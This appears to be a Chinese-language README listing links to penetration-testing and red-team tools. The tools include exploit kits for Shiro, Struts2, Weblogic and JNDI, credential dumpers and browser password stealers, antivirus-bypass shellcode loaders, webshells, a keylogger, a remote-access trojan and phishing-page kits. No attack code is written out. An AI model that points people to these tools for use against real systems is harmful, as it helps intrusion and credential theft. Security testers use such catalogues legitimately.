[一个各种方式突破Disable_functions达到命令执行的shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell) - [【PHP】bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)](https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD) - [另一个bypass PHP的disable_functions](https://github.com/mm0r1/exploits) - [cmd下查询3389远程桌面端口](./tools/cmd下查询3389远程桌面端口.md) - [伪装成企业微信名片的钓鱼代码](./tools/伪装成企业微信名片的钓鱼代码.txt) - [vbulletin5-rce利用工具(批量检测/getshell)](https://github.com/theLSA/vbulletin5-rce)/[保存了一份源码:vbulletin5-rce.py](./tools/vbulletin5-rce.py) - [CVE-2017-12615](./tools/CVE-2017-12615.py) - [通过Shodan和favicon icon发现真实IP地址](https://github.com/pielco11/fav-up) - [Cobalt_Strike扩展插件](./tools/Cobalt_Strike扩展插件.md) - [Windows命令行cmd的空格替换](./tools/Windows命令行cmd的空格替换.md) - [绕过disable_function汇总](./tools/绕过disable_function汇总.md) - [WAF Bypass](https://chybeta.gitbooks.io/waf-bypass/content/) - [命令注入总结](./tools/命令注入总结.md) - [隐藏wifi-ssid获取 · theKingOfNight's Blog](./books/隐藏wifi-ssid获取%20·%20theKingOfNight's%20Blog.pdf) - [crt.sh证书/域名收集](./tools/crt.sh证书收集.py) - [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan) - [TPScan.jar-Java编写的单文件版的TP漏洞扫描利用](./tools/TPScan.jar)-[源处](https://github.com/tangxiaofeng7/TPScan) - [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan) - [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py) - [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py) - [sqlmap_bypass安全狗2tamper](./tools/sqlmap_bypass_安全狗2_tamper.py) - [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py) - [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py) - [sqlmap bypass云锁tamper(利用云锁的注释不拦截缺陷,来自t00ls师傅)](https://github.com/Hsly-Alexsel/Bypass)-[t00ls原文地址](https://www.t00ls.net/thread-57788-1-1.html)|[项目留存PDF版本](./books/10种方法绕过云锁以及tamper.pdf) - [masscan+nmap扫描脚本](./tools/masscan%2Bnmap.py) - [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt) - [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck) - [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief) - [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell) - [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack) - [GitHacker---比GitHack更好用的git泄露利用脚本](https://github.com/WangYihang/GitHacker) - [git-dumper:一款优秀的.git泄漏文件dump工具](https://github.com/arthaud/git-dumper) - [GitHackTool:号称Git信息泄露唯一可用工具](https://github.com/safesword/GitHackTool) - [SVN源代码泄露全版本Dump源码](https://github.com/admintony/svnExploit) - [dumpall-多种泄漏形式,一种利用方式【支持.git源代码泄漏.svn源代码泄漏.DS_Store信息泄漏目录列出信息泄漏】](https://github.com/0xHJK/dumpall) - [多进程批量网站备份文件扫描](https://github.com/sry309/ihoneyBakFileScan) - [Empire](https://github.com/BC-SECURITY/Empire/)|相关文章:[后渗透测试神器Empire详解](https://mp.weixin.qq.com/s/xCtkoIwVomx5f8hVSoGKpA) - [FOFA Pro view 是一款FOFA Pro 资产展示浏览器插件,目前兼容 Chrome、Firefox、Opera](https://github.com/0nise/fofa_view) - [Zoomeye Tools-一款利用Zoomeye 获取有关当前网页IP地址的各种信息(需要登录)](https://chrome.google.com/webstore/detail/zoomeye-tools/bdoaeiibkccgkbjbmmmoemghacnkbklj) - [360 0Kee-Team 的 crawlergo动态爬虫 结合 长亭XRAY扫描器的被动扫描功能](https://github.com/timwhitez/crawlergo_x_XRAY) - [内网神器Xerosploit-娱乐性质(端口扫描|DoS攻击|HTML代码注入|JavaScript代码注入|下载拦截和替换|嗅探攻击|DNS欺骗|图片替换|Web页面篡改|Drifnet)](https://github.com/LionSec/xerosploit) - [一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo](https://github.com/c0ny1/xxe-lab) - [内网常见渗透工具包](https://github.com/yuxiaokui/Intranet-Penetration) - [从内存中加载 SHELLCODE bypass AV查杀](https://github.com/brimstone/go-shellcode)|[twitter示例](https://twitter.com/jas502n/status/1213847002947051521) - [流量转发工具-pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具](https://github.com/esrrhs/pingtunnel) - [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./adduser添加用户.md) |[【windows】绕过杀软添加管理员用户的两种方法](https://github.com/lengjibo/RedTeamTools/tree/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7)|[【windows】使用vbs脚本添加管理员用户](./使用vbs脚本添加管理员用户.md) - [NetUser-使用windows api添加用户,可用于net无法使用时(支持Nim版本)](https://github.com/lengjibo/NetUser) - [pypykatz-通过python3实现完整的Mimikatz功能(python3.6+)](https://github.com/skelsec/pypykatz) - [【windows】Bypassing AV via in-memory PE execution-通过在内存中加载多次XOR后的payload来bypass杀软](https://blog.dylan.codes/bypassing-av-via/)|[作者自建gitlab地址](https://git.dylan.codes/batman/darkarmour) - [wafw00f-帮助你快速识别web应用是否使用何种WAF(扫描之前很有用)](https://github.com/EnableSecurity/wafw00f) - [Linux提取其他用户密码的工具(需要root权限)](https://github.com/huntergregal/mimipenguin) - [apache2_BackdoorMod-apache后门模块](https://github.com/VladRico/apache2_BackdoorMod) - [对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)](https://github.com/uknowsec/SharpDecryptPwd) - [一个简单探测jboss漏洞的工具](https://github.com/GGyao/jbossScan) - [一款lcx在golang下的实现-适合内网代理流量到公网,比如阿里云的机器代理到你的公网机器](https://github.com/cw1997/NATBypass) - [Cobalt Strike Aggressor 插件包](https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts) - [Erebus-Cobalt Strike后渗透测试插件,包括了信息收集、权限获取、密码获取、痕迹清除等等常见的脚本插件](https://github.com/DeEpinGh0st/Erebus) - [cobaltstrike后渗透插件,偏向内网常用工具(目前包含1.定位域管理员2.信息收集(采用ADfind)3.权限维持(增加了万能密码,以及白银票据)4.内网扫描(nbtscan(linux/windows通用))5.dump数据库hash(支持mysql/mssql(快速获取数据库的hash值)))](https://github.com/wafinfo/cobaltstrike) - [AggressorScripts-适用于Cobalt Strike 3.x & 4.x 的插件【信息搜集/提权/定位域管/读取密码/内网扫描/RDP相关/添加用户/内网穿透/权限维持/日志清除/辅助模块/】](https://github.com/z1un/Z1-AggressorScripts) - [IP/IP段资产扫描-->扫描开放端口识别运行服务部署网站-->自动化整理扫描结果-->输出可视化报表+整理结果](https://github.com/LangziFun/LangNetworkTopology3) - [A script to scan for unsecured Laravel .env files](https://github.com/tismayil/laravelN00b) - [STS2G-Struts2漏洞扫描Golang版-【特点:单文件、全平台支持、可在webshell下使用】](https://github.com/x51/STS2G)|[编译好的Windows版本](./tools/ST2G.exe)|[Linux版本](./tools/ST2SG_linux) - [Struts2_Chek_BypassWAF.jar-struts2全版本漏洞测试工具17-6过WAF版 by:ABC_123 仅供天融信内部使用,勿用于非法用途](./tools/Struts2_Chek_BypassWAF.jar) - [ShiroScan-Shiro<=1.2.4反序列化,一键检测工具](https://github.com/sv3nbeast/ShiroScan)|[Apache shiro <= 1.2.4 rememberMe 反序列化漏洞利用工具](https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE)|[ShiroScan-Shiro RememberMe 1.2.4 反序列化漏洞图形化检测工具(Shiro-550)](https://github.com/fupinglee/ShiroScan)|[shiro_attack-shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马,支持shiro > 1.4.2 )](https://github.com/j1anFen/shiro_attack)-[shiro_attack_1.5.zip下载](./tools/shiro_attack_1.5.zip)|[又一个Shiro反序列化利用工具](https://github.com/LWZXS/JavaTools) - [weblogicScanner-完整weblogic 漏洞扫描工具修复版](https://github.com/0xn0ne/weblogicScanner) - [GitHub敏感信息泄露监控](https://github.com/FeeiCN/GSIL) - [Java安全相关的漏洞和技术demo](https://github.com/threedr3am/learnjavabug) - [在线扫描-网站基础信息获取|旁站|端口扫描|信息泄露](https://scan.top15.cn/web/) - [bayonet是一款src资产管理系统,从子域名、端口服务、漏洞、爬虫等一体化的资产管理系统](https://github.com/CTF-MissFeng/bayonet) - [SharpToolsAggressor-内网渗透中常用的c#程序整合成cs脚本,直接内存加载](https://github.com/uknowsec/SharpToolsAggressor) - [【漏洞库】又一个各种漏洞poc、Exp的收集或编写](https://github.com/coffeehb/Some-PoC-oR-ExP) - [【内网代理】内网渗透代理转发利器reGeorg](https://github.com/sensepost/reGeorg)|相关文章:[配置reGeorg+Proxifier渗透内网](https://www.k0rz3n.com/2018/07/06/如何使用reGeorg+Proxifier渗透内网)|[reGeorg+Proxifier实现内网sock5代理](http://jean.ink/2018/04/26/reGeorg/)|[内网渗透之reGeorg+Proxifier](https://sky666sec.github.io/2017/12/16/内网渗透之reGeorg-Proxifier)|[reGeorg+Proxifier使用](https://xz.aliyun.com/t/228) - [【内网代理】Neo-reGeorg重构的reGeorg ](https://github.com/L-codes/Neo-reGeorg) - [【内网代理】Tunna-通过http隧道将TCP流量代理出来](https://github.com/SECFORCE/Tunna) - [【内网代理】proxy.php-单文件版的php代理](https://github.com/mcnemesis/proxy.php) - [【内网代理】pivotnacci-通过HTTP隧道将TCP流量代理出来或进去](https://github.com/blackarrowsec/pivotnacci) - [【内网代理】毒刺(pystinger)通过webshell实现**内网SOCK4代理**,**端口映射**.](https://github.com/FunnyWolf/pystinger)|[pystinger.zip-下载](./tools/pystinger.zip) - [【内网代理】php-proxy-app-一款代理访问网站的工具](https://github.com/Athlon1600/php-proxy-app) - [【内网代理】reDuh-通过http隧道搭建代理(比较远古,酌情使用)](https://github.com/sensepost/reDuh) - [【内网代理】chisel:一款快速稳定的隧道工具(通过HTTP传输使用SSH加密)](https://github.com/jpillora/chisel) - [相关文章介绍](https://www.anquanke.com/post/id/234771) - [【内网代理】Ecloud是一款基于http/1.1协议传输TCP流量的工具,适用于内网不出网时通过web代理脚本转发tcp流量,以达到socket5隧道、内网cs等程序上线、反弹虚拟终端等功能](https://github.com/CTF-MissFeng/Ecloud) - [get_Team_Pass-获取目标机器上的teamviewerID和密码(你需要具有有效的目标机器账号密码且目标机器445端口可以被访问(开放445端口))](https://github.com/kr1shn4murt1/get_Team_Pass/) - [chromepass-获取chrome保存的账号密码/cookies-nirsoft出品在win10+chrome 80测试OK](./tools/chromepass/)|[SharpChrome-基于.NET 2.0的开源获取chrome保存过的账号密码/cookies/history](https://github.com/djhohnstein/SharpChrome)|[ChromePasswords-开源获取chrome密码/cookies工具](https://github.com/malcomvetter/ChromePasswords) - [java-jdwp远程调试利用](https://github.com/Lz1y/jdwp-shellifier)|相关文章:[jdwp远程调试与安全](https://qsli.github.io/2018/08/12/jdwp/) - [社会工程学密码生成器,是一个利用个人信息生成密码的工具](https://github.com/zgjx6/SocialEngineeringDictionaryGenerator) - [云业CMS(yunyecms)的多处SQL注入审计分析](./books/云业CMS(yunyecms)的多处SQL注入审计分析.pdf)|[原文地址](https://xz.aliyun.com/t/7302)|[官网下载地址](http://www.yunyecms.com/index.php?m=version&c=index&a=index)|[sqlmap_yunyecms_front_sqli_tamp.py](./tools/sqlmap_yunyecms_front_sqli_tamp.py) - [www.flash.cn 的钓鱼页,中文+英文](https://github.com/r00tSe7en/Fake-flash.cn)|[Flash-Pop:flash 钓鱼弹窗优化版](https://github.com/r00tSe7en/Flash-Pop)|[Flash-Pop2:Flash-Pop升级版](https://github.com/chroblert/Flash-Pop2) - [织梦dedecms全版本漏洞扫描](https://github.com/Mr-xn/dedecmscan) - [CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection) - [Dirble -快速目录扫描和爬取工具【比dirsearch和dirb更快】](https://github.com/nccgroup/dirble) - [RedRabbit - Red Team PowerShell脚本](https://github.com/securethelogs/RedRabbit) - [Pentest Tools Framework - 渗透测试工具集-适用于Linux系统](https://github.com/pikpikcu/Pentest-Tools-Framework) - [白鹿社工字典生成器,灵活与易用兼顾。](https://github.com/HongLuDianXue/BaiLu-SED-Tool) - [NodeJsScan-一款转为Nodejs进行静态代码扫描开发的工具](https://github.com/ajinabraham/NodeJsScan) - [一款国人根据poison ivy重写的远控](https://github.com/killeven/Poison-Ivy-Reload) - [NoXss-可配合burpsuite批量检测XSS](https://github.com/lwzSoviet/NoXss) - [fofa 采集脚本](https://raw.githubusercontent.com/ggg4566/SomeTools/master/fofa_search.py) - [java web 压缩文件 安全 漏洞](https://github.com/jas502n/Java-Compressed-file-security) - [可以自定义规则的密码字典生成器,支持图形界面](https://github.com/bit4woo/passmaker) - [dump lass 工具(绕过/干掉卡巴斯基)](./books/dump%20lass%20工具.pdf)|[loader.zip下载](./tools/loader.zip) - [GO语言版本的mimikatz-编译后免杀](https://github.com/vyrus001/go-mimikatz) - [CVE-2019-0708-批量检测扫描工具](./tools/cve0708.rar) - [dump lsass的工具](https://github.com/outflanknl/Dumpert)|[又一个dump lsass的工具](https://github.com/7hmA3s/dump_lsass) - [Cobalt Strike插件 - RDP日志取证&清除](https://github.com/QAX-A-Team/EventLogMaster) - [xencrypt-一款利用powershell来加密并采用Gzip/DEFLATE来绕过杀软的工具](https://github.com/the-xentropy/xencrypt) - [SessionGopher-一款采用powershell来解密Windows机器上保存的session文件,例如: WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop,支持远程加载和本地加载使用](https://github.com/Arvanaghi/SessionGopher) - [CVE-2020-0796 Local Privilege Escalation POC-python版本](https://github.com/ZecOps/CVE-2020-0796-LPE-POC)|[CVE-2020-0796 Remote Code Execution POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC) - [Windows杀软在线对比辅助](https://github.com/r00tSe7en/get_AV) - [递归式寻找域名和api](https://github.com/p1g3/JSINFO-SCAN) - [mssqli-duet-用于mssql的sql注入脚本,使用RID爆破,从Active Directory环境中提取域用户](https://github.com/Keramas/mssqli-duet) - [【Android 移动app渗透】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser) - [【android 移动app渗透】apkleaks-扫描APK文件提取URL、终端和secret](https://github.com/dwisiswant0/apkleaks) - [ShiroExploit-Deprecated-Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit-Deprecated) - [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md) - [phpstudy RCE 利用工具 windows GUI版本](https://github.com/aimorc/phpstudyrce) - [WebAliveScan-根据端口快速扫描存活的WEB](https://github.com/broken5/WebAliveScan) - [bscan-bscan的是一款强大、简单、实用、高效的HTTP扫描器。(WebAliveScan的升级版本)](https://github.com/broken5/bscan) - [扫描可写目录.aspx](./tools/扫描可写目录.aspx) - [PC客户端(C-S架构)渗透测试](https://github.com/theLSA/CS-checklist) - [wsltools-web扫描辅助python库](https://github.com/Symbo1/wsltools) - [struts2_check-用于识别目标网站是否采用Struts2框架开发的工具](https://github.com/coffeehb/struts2_check) - [sharpmimi.exe-免杀版mimikatz](./tools/sharpmimi.exe) - [thinkPHP代码执行批量检测工具](https://github.com/admintony/thinkPHPBatchPoc) - [pypykatz-用纯Python实现的Mimikatz](https://github.com/skelsec/pypykatz) - [Flux-Keylogger-具有Web面板的现代Javascript键盘记录器](https://github.com/LimerBoy/Flux-Keylogger) - [JSINFO-SCAN-递归式寻找域名和api](https://github.com/p1g3/JSINFO-SCAN) - [FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架](https://github.com/qianxiao996/FrameScan-GUI) - [SRC资产信息聚合网站](https://github.com/cckuailong/InformationGather) - [Spring Boot Actuator未授权访问【XXE、RCE】单/多目标检测](https://github.com/rabbitmask/SB-Actuator) - [JNDI 注入利用工具【Fastjson、Jackson 等相关漏洞】](https://github.com/JosephTribbianni/JNDI)|[JNDIExploit](https://github.com/0x727/JNDIExploit)|[JNDIExploit](https://github.com/feihong-cs/JNDIExploit)|[JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit)|[JNDIScan:无须借助dnslog且完全无害的JNDI反连检测工具,解析RMI和LDAP协议实现,可用于甲方内网自查](https://github.com/EmYiQing/JNDIScan)|[JNDI-Inject-Exploit:解决FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用,探测本地可用反序列化gadget达到命令执行、回显命令执行、内存马注入(支持JNDI注入高版本JDK Bypass命令回显、内存马注入)](https://github.com/exp1orer/JNDI-Inject-Exploit) - [fastjson_rec_exploit-fastjson一键命令执行(python版本)](https://github.com/mrknow001/fastjson_rec_exploit)|[FastjsonExploit:fastjson漏洞快速利用框架](https://github.com/c0ny1/FastjsonExploit)|[fastjsonScan:fastjson漏洞burp插件](https://github.com/zilong3033/fastjsonScan) - [各种反弹shell的语句集合页面](https://krober.biz/misc/reverse_shell.php) - [解密weblogic AES或DES加密方法](https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi) - [使用 sshLooterC 抓取 SSH 密码](https://github.com/mthbernardes/sshLooterC)|[相关文章](https://www.ch1ng.com/blog/208.html)|[本地版本](./books/使用sshLooterC抓取SSH密码.pdf) - [redis-rogue-server-Redis 4.x/5.x RCE](https://github.com/AdministratorGithub/redis-rogue-server) - [Rogue-MySql-Server-搭建mysql虚假服务端来读取链接的客户端的文件](https://github.com/allyshka/Rogue-MySql-Server) - [ew-内网穿透(跨平台)](https://github.com/idlefire/ew) - [xray-weblisten-ui-一款基于GO语言写的Xray 被动扫描管理](https://github.com/virink/xray-weblisten-ui) - [SQLEXP-SQL 注入利用工具,存在waf的情况下自定义编写tamper脚本 dump数据](https://github.com/ggg4566/SQLEXP) - [SRC资产在线管理系统 - Shots](https://github.com/broken5/Shots) - [luject:可以将动态库静态注入到指定应用程序包的工具,目前支持Android/iPhonsOS/Windows/macOS/Linux](https://github.com/lanoox/luject)|[相关文章](https://tboox.org/cn/2020/04/26/luject/) - [CursedChrome:Chrome扩展植入程序,可将受害Chrome浏览器转变为功能齐全的HTTP代理,使你能够以受害人身份浏览网站](https://github.com/mandatoryprogrammer/CursedChrome) - [pivotnacci:通过HTTP隧道进行Socks连接](https://github.com/blackarrowsec/pivotnacci) - [PHPFuck-一款适用于php7以上版本的代码混淆](https://github.com/splitline/PHPFuck)|[PHPFuck在线版本](https://splitline.github.io/PHPFuck/) - [冰蝎 bypass open_basedir 的马](./tools/冰蝎bypass_open_basedir_shell.md) - [goproxy heroku 一键部署套装,把heroku变为免费的http(s)\socks5代理](https://github.com/snail007/goproxy-heroku) - [xFTP6密码解密](./tools/xFTP6密码解密.md) - [Mars-战神TideSec出品的WDScanner的重写一款综合的漏洞扫描,资产发现/变更,域名监控/子域名挖掘,Awvs扫描,POC检测,web指纹探测、端口指纹探测、CDN探测、操作系统指纹探测、泛解析探测、WAF探测、敏感信息检测等等工具](https://github.com/TideSec/Mars) - [Shellcode Compiler:用于生成Windows 和 Linux平台的shellcode工具](https://github.com/NytroRST/ShellcodeCompiler) - [BadDNS 是一款使用 Rust 开发的使用公共 DNS 服务器进行多层子域名探测的极速工具](https://github.com/joinsec/BadDNS) - [【Android脱壳】XServer是一个用于对方法进行分析的Xposed插件](https://github.com/monkeylord/XServer)|[相关文章:Xposed+XServer无需脱壳抓取加密包](https://xz.aliyun.com/t/7669)|[使用xserver对某应用进行不脱壳抓加密包](https://blog.csdn.net/nini_boom/article/details/104400619) - [masscan_to_nmap-基于masscan和nmap的快速端口扫描和指纹识别工具](https://github.com/7dog7/masscan_to_nmap) - [Evilreg -使用Windows注册表文件的反向Shell (.Reg)](https://github.com/thelinuxchoice/evilreg) - [Shecodject工具使用python注入shellcode bypass 火絨,360,windows defender](https://github.com/TaroballzChen/Shecodject) - [Malleable-C2-Profiles-Cobalt Strike的C2隐藏配置文件相关](https://github.com/xx0hcd/Malleable-C2-Profiles)|[渗透利器Cobalt Strike - 第2篇 APT级的全面免杀与企业纵深防御体系的对抗](https://xz.aliyun.com/t/4191) - [AutoRemove-自动卸载360](https://github.com/DeEpinGh0st/AutoRemove) - [ligolo:用于渗透时反向隧道连接工具](https://github.com/sysdream/ligolo) - [RMIScout: Java RMI爆破工具](https://github.com/BishopFox/rmiscout) - [【Android脱壳】FRIDA-DEXDump-【使用Frida来进行Android脱壳】](https://github.com/hluwa/FRIDA-DEXDump) - [XAPKDetector-全平台的android查壳工具](https://github.com/horsicq/XAPKDetector) - [Donut-Shellcode生成工具](https://github.com/TheWover/donut) - [JSP-Webshells集合【2020最新bypass某云检测可用】](https://github.com/threedr3am/JSP-Webshells) - [one-scan-多合一网站指纹扫描器,轻松获取网站的 IP / DNS 服务商 / 子域名 / HTTPS 证书 / WHOIS / 开发框架 / WAF 等信息](https://github.com/Jackeriss/one-scan) - [ServerScan一款使用Golang开发的高并发网络扫描、服务探测工具。](https://github.com/Adminisme/ServerScan) - [域渗透-Windows hash dump之secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)|[相关文章](https://github.com/PythonPig/PythonPig.github.io/blob/730be0e55603df96f45680c25c56ba8148052d2c/_posts/2019-07-16-Windows%20hash%20dump%E4%B9%8Bsecretsdump.md) - [WindowsVulnScan:基于主机的漏洞扫描工【类似windows-exp-suggester】](https://github.com/chroblert/WindowsVulnScan) - [SpoofWeb:一键部署HTTPS钓鱼站](https://github.com/klionsec/SpoofWeb) - [VpsEnvInstall:一键部署VPS渗透环境](https://github.com/klionsec/VpsEnvInstall) - [tangalanga:Zoom会议扫描工具](https://github.com/elcuervo/tangalanga) - [碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC](https://github.com/Cl0udG0d/SZhe_Scan) - [Taie-RedTeam-OS-泰阿安全实验室-基于XUbuntu私人订制的红蓝对抗渗透操作系统](https://github.com/taielab/Taie-RedTeam-OS) - [naiveproxy-一款用C语言编写类似于trojan的代理工具](https://github.com/klzgrad/naiveproxy) - [BrowserGhost-一个抓取浏览器密码的工具,后续会添加更多功能](https://github.com/QAX-A-Team/BrowserGhost) - [GatherInfo-渗透测试信息搜集/内网渗透信息搜集](https://github.com/Paper-Pen/GatherInfo) - [EvilPDF:一款把恶意文件嵌入在 PDF 中的工具](https://github.com/thelinuxchoice/evilpdf) - [SatanSword-红队综合渗透框架,支持web指纹识别、漏洞PoC检测、批量web信息和端口信息查询、路径扫描、批量JS查找子域名、使用google headless、协程支持、完整的日志回溯](https://github.com/Lucifer1993/SatanSword) - [Get-WeChat-DB-获取目标机器的微信数据库和密钥](https://github.com/A2kaid/Get-WeChat-DB) - [ThinkphpRCE-支持代理IP池的批量检测Thinkphp漏洞或者日志泄露的py3脚本](https://github.com/sukabuliet/ThinkphpRCE) - [fakelogonscreen-伪造(Windows)系统登录页面,截获密码](https://github.com/bitsadmin/fakelogonscreen) - [WMIHACKER-仅135端口免杀横向移动](https://github.com/360-Linton-Lab/WMIHACKER)|[使用方法以及介绍](./books/WMIHACKER(仅135端口免杀横向移动).pdf)|[横向移动工具WMIHACKER](./books/横向移动工具WMIHACKER.pdf)|[原文链接](https://www.anquanke.com/post/id/209665) - [cloud-ranges-部分公有云IP地址范围](https://github.com/pry0cc/cloud-ranges) - [sqltools_ch-sqltools2.0汉化增强版](./ttools/sqltools_ch.rar) - [railgun-poc_1.0.1.7-多功能端口扫描/爆破/漏洞利用/编码转换等](./tools/railgun-poc_1.0.1.7.zip)|[railgun作者更新到GitHub了,目前是1.2.8版本](https://github.com/lz520520/railgun)|[railgun-v1.2.8.zip-存档](./tools/railgun.zip) - [dede_funcookie.php-DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./tools/dede_funcookie.php) - [WAScan-一款功能强大的Web应用程序扫描工具【基于python开发的命令行扫描器】](https://github.com/m4ll0k/WAScan) - [Peinject_dll-Cobalt Strike插件之另类持久化方法-PE感染](https://github.com/m0ngo0se/Peinject_dll) - [MSSQL_BackDoor-摆脱MSSMS和 Navicat 调用执行 sp_cmdExec](https://github.com/evi1ox/MSSQL_BackDoor) - [xShock-一款针对Shellshock漏洞的利用工具【例如低版本cgi的默认配置页面进行利用】](https://github.com/capture0x/xShock/) - [tini-tools-针对红蓝对抗各个场景使用的小工具-【主要是Java写的工具】【目前有phpstudy.jar和域名转IP工具.jar】](https://github.com/sunird/tini-tools) - [code6-码小六是一款 GitHub 代码泄露监控系统,通过定期扫描 GitHub 发现代码泄露行为](https://github.com/4x99/code6) - [taowu-cobalt-strike-适用于cobalt strike3.x与cobalt strike4.x的插件](https://github.com/pandasec888/taowu-cobalt-strike) - [Weblogic-scan-Weblogic 漏洞批量扫描工具](./tools/Weblogic-scan) - [revp:反向HTTP代理,支持Linux,Windows和macOS](https://github.com/jafarlihi/revp) - [fofa2Xray-一款联合fofa与xray的自动化批量扫描工具,使用Golang编写,适用于windows与linux](https://github.com/piaolin/fofa2Xray) - [CasExp-Apereo CAS 反序列化利用工具](https://github.com/potats0/CasExp) - [C_Shot-shellcode远程加载器](https://github.com/anthemtotheego/C_Shot)|[相关文章](./books/C_shot–shellcode远程加载器.pdf) - [dz_ml_rce.py-Discuz! ml RCE漏洞利用工具](./tools/dz_ml_rce.py) - [Redis未授权访问漏洞利用工具](./tools/Redis_Exp-by_PANDA墨森.zip) - [Shiro 回显利用工具](./tools/shiroPoc-1.0-SNAPSHOT-jar-with-dependencies_20200726_130831.jar)|[相关文章](./books/Shiro_回显利用工具.pdf) - [GetIPinfo-用于寻找多网卡主机方便内网跨网段渗透避免瞎打找不到核心网](https://github.com/r35tart/GetIPinfo) - [Layer子域名挖掘机-Layer5.0 SAINTSEC](https://github.com/euphrat1ca/LayerDomainFinder) - [cve_2020_14644.jar-Weblogic 远程命令执行漏洞(CVE-2020-14644)回显利用工具](./tools/cve_2020_14644.jar) - [TechNet-Gallery-PowerShell武器库](https://github.com/MScholtes/TechNet-Gallery)|[Powershell ebserver:PowerShell实现的Web服务器,无需IIS,支持PowerShell命令执行、脚本执行、上传、下载等功能](https://github.com/MScholtes/TechNet-Gallery/tree/master/Powershell%20Webserver)|[PS2EXE-GUI:将PowerShell脚本转换为EXE文件](https://github.com/MScholtes/TechNet-Gallery/tree/master/PS2EXE-GUI) - [spybrowse:窃取指定浏览器的配置文件](https://github.com/1d8/spybrowse) - [FavFreak:执行基于favicon.ico的侦察](https://github.com/devanshbatham/FavFreak) - [gorailgun_v1.0.7-集漏洞端口扫描利用于一体的工具](./tools/gorailgun_v1.0.7.zip) - [【shell管理工具】Godzilla-哥斯拉](https://github.com/BeichenDream/Godzilla)|[AntSword-蚁剑](https://github.com/AntSwordProject)|[Behinder-冰蝎](https://github.com/rebeyond/Behinder) - [由python编写打包的Linux下自动巡检工具](./tools/linux_auto_xunjian)|[源处](https://github.com/heikanet/linux_auto_xunjian) - [【内网探测】SharpNetCheck-批量检测机器是否有出网权限,可在dnslog中回显内网ip地址和计算机名,可实现内网中的快速定位可出网机器](https://github.com/uknowsec/SharpNetCheck) - [fofa搜索增强版-使用fofa的url+cookies即可自动下载所有结果](./tools/fofa搜索增强版.zip) - [SharpBlock-A method of bypassing EDR's active projection DLL's by preventing entry point exection](https://github.com/CCob/SharpBlock)|[相关文章](https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/) - [bypasswaf-云锁数字型注入tamper/安全狗的延时、布尔、union注入绕过tamper](https://github.com/pureqh/bypasswaf) - [通达OA 2017 版本SQL注入脚本](./tools/tongda_oa_2017_sql_injection.py) - [t14m4t:一款封装了THC-Hydra和Nmap的自动化爆破工具](https://github.com/MS-WEB-BN/t14m4t) - [ksubdomain:一款基于无状态子域名爆破工具](https://github.com/knownsec/ksubdomain) - [smuggler-一款用python3编写的http请求走私验证测试工具](https://github.com/defparam/smuggler) - [Fuzz_dic:又一个类型全面的参数和字典收集项目](https://github.com/SmithEcon/Fuzz_dic) - [【爆破字典】自己收集整理的端口、子域、账号密码、其他杂七杂八字典,用于自己使用](https://github.com/cwkiller/Pentest_Dic) - [【爆破字典】基于实战沉淀下的各种弱口令字典](https://github.com/Mr-xn/SuperWordlist) - [【爆破字典整合推荐】PentesterSpecialDict-该项目对 [ fuzzDicts | fuzzdb | Dict ] 等其他网上字典开源项目进行整合精简化和去重处理](https://github.com/ppbibo/PentesterSpecialDict) - [可能是目前最全面的开源模糊测试字典集合了](https://github.com/salmonx/dictionaries) - [PowerUpSQL:为攻击SQLServer而设计的具有攻击性的PowerShell脚本](https://github.com/NetSPI/PowerUpSQL)|[利用PowerUpSQL攻击SQL Server实例](./books/%E5%88%A9%E7%94%A8PowerUpSQL%E6%94%BB%E5%87%BBSQL%20Server%E5%AE%9E%E4%BE%8B.pdf) - [adbsploit-一个基于Python3和ADB的安卓设备漏洞利用和管理工具](https://github.com/mesquidar/adbsploit) - [monsoon-一个用Go语言编写的目录扫描工具,类似于dirsearch](https://github.com/RedTeamPentesting/monsoon) - 